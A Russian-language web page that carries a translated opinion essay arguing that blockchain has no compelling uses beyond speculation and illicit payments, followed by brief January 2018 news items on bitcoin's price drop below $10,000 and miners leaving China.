Следующее правдоподобное использование блокчейна: допустим, вы хотите сделать публичное, неизменяемое и неудаляемое подписанное заявление, и вы можете «опубликовать» его в блокчейне. То есть распределённый журнал можно считать чем-то вроде дневника, а не способа покупки и продажи. В теории, вы можете использовать его для записи голосов на выборах, проверки происхождения алмазов или фирменной экипировки, проверки личности, определения принадлежности доменных имён, хранения денег на счетах-эскроу, огласки временных запечатанных патентов, нотариального заверения и так далее.

Один голос на человека. Посчитать биткоин-кошельки гораздо труднее!

Если не вдаваться в подробности, то все эти способы применения блокчейна не выдерживают критики. В голосовании сегодня принято записывать общее количество выборных бюллетеней, чтобы голосующие бросали настоящие бумажные экземпляры в ящики, а журналисты и наблюдатели всё время следили за этими ящиками.

Серьёзной проблемой голосования является учёт проголосовавших и анонимов, а также удостоверенность, что количество голосовавших равно количеству голосов. Бумажные бюллетени позволяют это сделать гораздо лучше блокчейна.

Для нотариальных задач, проверка вашего водительского удостоверения или наличия известных вам свидетелей означает отсутствие подписи украденным паролем или приватным ключом. Но если пароль или приватный ключ соответствуют, то вы можете просто опубликовать документ, подписанный PGP-ключом. Для проверки подлинности фирменных товаров вроде часов или сумок, или проверки этичности добычи бриллиантов нет смысла в распределённом и зашифрованном журнале, он не добавляет никакой ценности. Производитель может просто приложить сертификат, проверяемый на сайте, как это делалось раньше. В случае с депонированием смарт-контракт может автоматически заплатить за товары без проверки третьей стороной и удерживать средства, но вам всё же нужна доверенная сторона для проверки доставки товара, его количества и качества.

Доказывание в современном мире, что ты что-то знаешь.

Наконец, если вам нужно неопровержимо доказать, что вы узнали что-то в такое-то время, без обнародования этой информации, то зашифруйте и отправьте по почте самому себе, или опубликуйте на Bitbucket, или напечатайте и заверьте у нотариуса, или отправьте себе бумажным письмом, или напишите в твиттер md5-сообщение, или ещё что-нибудь сделайте. Но опять же, насколько велика индустрия неопровержимого-доказывания-что-вы-узнали-что-то-в-такое-то-время-без-обнародования? Вы можете припомнить ведущую компанию, или вообще любую компанию, предоставляющую подобную услугу?

Что касается разрешения доменов (domain resolution) — процесса определения, чьи серверы должны видеть трафик и отвечать на ваши запросы при вводе URL в браузере, — то представляется, что полностью цифровая запись смарт-контрактов, когда факт платежа, публикуемый в реестре, также обновляет схему разрешения домена, устраняет необходимость в сервисах условного депонирования доменов. Однако на практике, как в случае с DAO или иными смарт-контрактами, если ценные домены меняют хозяев в результате кражи или проблем с безопасностью, то вам нужно переписать журнал, например, по судебному предписанию. Повторяется история с банковскими счетами, поддерживаемыми правительством и законами: настоящие компании не горят желанием оказаться в ситуации, при которой взлом или кража паролей может привести к чьему-то вечному и бесповоротному владению доменами bankofamerica.com, или disney.com, или sony.com и так далее. Внедрение блокчейна повышает риск кражи или подмены, а не уменьшает. Это звучит умозрительно, пока не вспомнишь о том, что ведущие биткоин-биржи часто становятся жертвами хакеров — и это очень редко происходит с крупными доменными провайдерами.

Так что же остаётся?

В будущем стиральные машины смогут заказывать свой собственный стиральный порошок.

Это прозвучит тривиально: всем известно, что к товарам прикладывают сертификаты подлинности с ID-номерами, которые можно проверить на сайте производителя — за исключением того, что в каждом случае были потрачены миллионы, если не десятки миллионов долларов на компании, предназначенные для решения именно этой задачи. Можно придумать ещё более эзотерические решения: Second Life на блокчейне; или блокчейн-приложения, позволяющие стиральным машинам через смарт-конракт заказывать себе стиральный порошок; или спортивные лиги, в которых решения тренеров записываются в блокчейне (серьёзно!).

В результате преимущества существующих человеческих и программных систем, относящихся к транзакциям — от идентфикации личности по водительским правам к вызову и разъяснению положений в спорной кредитной транзакции, до автоматического списания денег с вашей кредитки за газетную подписку — перевешивают предполагаемые выгоды, а также скрытые расходы или безотзывное автоматическое исполнение. Блокчейн-энтузиасты часто ведут себя так, будто А трудно получить деньги от Б, или трудно сохранить записи о произошедшем. В каждом случае перевод денег или регистрация транзакции — это на самом деле простые, дешёвые и высокоавтоматизированные части гораздо более сложных систем.

И в результате мы вернулись к началу: валютным спекуляциям и нелегальным транзакциям. Возможно, попутно получив урок. В беседах с биткоин-предпринимателями, инвесторами и консультантами я часто сталкивался с нехваткой знаний или даже интереса к тому, как сегодня выполняются различные процессы или какова ценность для конечного пользователя. Несмотря на все деньги, потраченные на биткоин-кассы, никто не провёл исследования, хотят ли большинство владельцев кредитных карт отказаться от своих авиамиль в обмен на потерю возможности оспаривать транзакции. Вероятно, все эти люди думают, что дороговизна IPO и трудности оформления документации при образовании венчурного фонда связаны со всеми этими юристами и экономистами, которые просиживают свои зарплаты… конечно, кучка 20-летних инженеров-умников без опыта работы в индустрии без проблем автоматизируют работу этих дармоедов, всего за несколько месяцев и несколько миллионов баксов венчурного капитала.

Но пока-что не очень получается.

Источник: https://hackernoon.com/ten-years-in-nobody-has-come-up-with-a-use-case-for-blockchain-ee98c180100
Перевод: https://habrahabr.ru/company/raiffeisenbank/blog/346534/

Цена биткоина опустилась ниже отметки в $10000

Цена биткоина опустилась ниже отметки в $10000

Сегодня, 17 января, на ряде бирж цена первой криптовалюты «проломила» психологический уровень в $10000. К настоящему моменту цена биткоина отскочила от этого уровня и находится в районе $10,3–10,5 тыс.

После достижения своего максимума, 17 декабря 2017 года, на отметке $19891 цена биткоина начала стремительное падение, которое продолжается и по сей день. Так, за прошедшие семь дней «цифровое золото» подешевело почти на треть, а общая капитализация рынка снизилась до $469 млрд.

Текущий курс Биткоина:

Цена биткоина опустилась ниже отметки в $10000

Цена биткоина опустилась ниже отметки в $10000

https://www.cryptocompare.com/coins/btc/overview/USD

Цена биткоина опустилась ниже отметки в $10000

https://www.cryptocompare.com/coins/eth/overview/USD

Цена биткоина опустилась ниже отметки в $10000

https://coinmarketcap.com/

Биткоин (BTC)

Майнеры покидают Китай из-за давления власти

Крупнейший китайский производитель майнингового оборудования Bitmain уже переносит свои мощности за пределы страны. Кроме того, компания открыла штаб-квартиру в Сингапуре, а также запустила майнинг-операции в США и Канаде.

Еще несколько крупных пулов, таких как BTC. top и ViaBTC, уже открыли свои подразделения в других странах.

Напомним, в прошлом году в Китае запретили проведение ICO, а на этой неделе правительство страны предложило ограничить энергопотребление в сфере майнинга.

Форклог

Звёзд: 1Звёзд: 2Звёзд: 3Звёзд: 4Звёзд: 5 (Пока оценок нет)
Загрузка...

Страница 1 из 26

© 2007–2018, konyakov.ru